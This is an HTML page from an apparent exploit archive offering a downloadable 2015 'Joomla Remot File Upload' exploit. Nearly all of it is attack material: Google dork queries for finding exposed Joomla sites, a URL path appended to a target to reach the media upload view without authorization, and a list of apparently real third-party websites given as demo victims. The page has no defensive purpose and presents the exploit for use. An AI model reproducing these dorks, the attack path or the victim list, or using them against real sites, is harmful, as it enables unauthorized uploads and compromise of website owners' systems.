<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-42</title>
    </head>
    <body>
        <center>
                <a  href="exploit-42" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
########################################################
# Exploit Title: Joomla Remot File Upload Vulnerability
########################################################
# Google Dork1: inurl:index.php?option=com_media & site:com
# Google Dork2: inurl:index.php?option=com_media & site:org
# Google Dork3: inurl:index.php?option=com_media & site:net
# Date: [22/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.This Is A Olugin Of Joomla For Upload Files.
# Exploit:
# Add This Link After Address Target
# /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
# For Exmple: Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
########################################################
# Demo:
# http://drugfreeclubXsofamerica.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
# http://www.saba4X215.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
# http://www.johnwargoX.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
# http://www.diffhospitXal.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
# http://www.smartcaXrleasing.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
# http://fvteamsportXs.com/joomla/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################
        </pre>
    </body>
</html>